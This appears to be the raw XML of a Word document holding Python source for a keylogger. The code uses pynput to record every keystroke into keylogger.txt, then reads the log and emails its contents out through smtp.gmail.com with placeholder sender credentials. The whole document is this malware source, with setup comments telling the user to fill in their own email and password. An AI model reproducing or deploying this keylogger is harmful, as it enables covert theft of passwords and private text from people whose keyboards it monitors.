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06F0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pynput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import keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59970C5D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smtplib,ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A222D48" w14:textId="77777777" w:rsidR="0046051C" w:rsidRPr="001922CC" w:rsidRDefault="0046051C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22A33" w14:textId="6FAEA5F9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22CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sender_mail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= "user@domain.com"     # Replace user@domain.com with your email id (everywhere)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD994E9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prefer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 xml:space="preserve"> using your own email id for receiver's as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C212C56" w14:textId="77777777" w:rsidR="0046051C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22CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>receiver_mail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= "user@domain.com"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3272D4" w14:textId="645E2E40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# Replace user@domain.com with your email id (everywhere)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C668D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6C1418" w14:textId="67B95F5D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password = "passcode"              # Enter your Password here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264BB7D5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port = 587</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D83B6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message = """From: user@domain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6C7E4B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To: user@domain.com                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2035D7D8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KeyLogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E816CCE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7CED6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Text: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Keylogs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6C3D5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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C937EE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def write(text):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5178F495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with open("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keylogger.txt",'a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') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284BD198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(text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB48969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7A9C846D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14D52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on_key_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Key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E502938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044A0870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 xml:space="preserve">Key ==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keyboard.Key.enter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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273261EB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write("\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E334CF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16DCB21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write(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001922CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Key.char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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208A1578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98607B" w14:textId="77777777" w:rsidR="00AC75B6" w:rsidRPr="001922CC" w:rsidRDefault="00AC75B6">
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C169A57" w14:textId="6C666E0A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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> except AttributeError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2BBE12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if Key ==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keyboard.Key.backspace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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B27706F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nBackspace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Pressed\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63113F7E" w14:textId="7F7E78A6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 xml:space="preserve">Key ==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keyboard.Key.tab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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BDB7A4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nTab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 Pressed\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AD383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 xml:space="preserve">Key ==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keyboard.Key.space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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD126A0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write(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" ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C3A064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CECF51E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Key)+" Pressed.\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984631B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write(temp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DAC92B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    print("\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n{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} Pressed\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n".format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(Key))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15550404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E8CDA3" w14:textId="31E7668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on_key_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Key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025C620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#This stops the Listener/Keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342E9749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#You can use any key you like by replacing "esc" with the key of your choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6EA74E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 xml:space="preserve">Key ==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keyboard.Key.esc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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021548B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05940F45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A7BA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keyboard.Listener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on_press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on_key_press,on_release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on_key_release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 as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15978312" w14:textId="7987BF0D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listener.join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708BFD63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>with open("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keylogger.txt",'r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') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584B37A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    temp =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0EE63A8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message = message + str(temp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3160BD90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46C7C071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5C6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context =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ssl.create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_default_context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2E34CE42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22CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">server = </w:t>
      </w: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('smtp.gmail.com', port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD9813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p w14:paraId="453FAAAC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22CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>server.login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sender_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001922CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mail,password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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36835417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server.sendmail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sender_mail,receiver_mail,message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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673DB465" w14:textId="77777777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922C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22CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"Email Sent to ",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001922CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sender_mail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001922CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF5E226" w14:textId="453E6FD1" w:rsidR="00AC75B6" w:rsidRPr="001922CC" w:rsidRDefault="00AC75B6" w:rsidP="00AC75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22CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>server.quit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001922CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AC75B6" w:rsidRPr="00192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B6"/>
    <w:rsid w:val="001922CC"/>
    <w:rsid w:val="002206A3"/>
    <w:rsid w:val="0046051C"/>
    <w:rsid w:val="00740E30"/>
    <w:rsid w:val="00A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B27F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{170467E7-5E82-4D99-A4FE-515F216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SHARMA</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SURESH KUMAR SHARMA</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-26T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-26T16:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>